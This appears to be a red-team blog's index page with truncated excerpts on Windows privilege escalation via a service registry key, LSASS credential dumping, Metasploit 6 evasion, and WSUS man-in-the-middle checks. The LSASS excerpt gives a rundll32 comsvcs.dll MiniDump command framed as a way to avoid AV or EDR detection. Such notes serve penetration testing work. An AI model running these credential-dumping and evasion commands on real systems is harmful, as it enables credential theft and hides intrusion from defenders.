Privilege Escalation via the registry

Reading Time: < 1 minutereg query HKLM\SYSTEM\CurrentControlSet\Services\regsvc HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\regsvcType REG_DWORD 0x10Start REG_DWORD 0x3ErrorControl REG_DWORD 0x1ImagePath REG_EXPAND_SZ “C:\Program Files\Insecure...

Dumping LSASS different ways

Reading Time: < 1 minuteA few techniques to avoid AV or EDR detection rundll32 C:\windows\system32\comsvcs.dll MiniDump “[LSASS_PID] dump.bin full” procdump <process id> instead of the word lsass Signed Executable which can be used also CiscoJabber :...
MSF6

MSF6

Reading Time: 4 minutesMSF (Metasploit) version 6. Network possible detection ? OJ ( @TheColonial ) is a clever guy and a main contributor to the open source project of Metasploit. One of MSF6’s goal is to get rid of Strings in order to fly even lower … so close to...

Lsass Minidump file seen as Malicious by McAfee AV

Reading Time: 3 minutesThe other day, I was shadowing a colleague of me who was doing a red team. The client was running McAfee AV. While the reputation of that AV isn’t the best, it got a bit in the way for a few minutes. After doing a lateral movement, my...

xsoar demisto misc values / commands

Reading Time: < 1 minuteseverity-> Unknown (0), Informational (0.5), Low (1), Medium (2), High (3), Critical (4) To create a new docker with some lib dependancies (or update current one) /docker_image_create name=testdocker base=demisto/python3...

WSUS attacks

Reading Time: < 1 minuteto check if a Win domain is a possible candidate to a MITM WSUS attack check reg query HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate /v WUServer...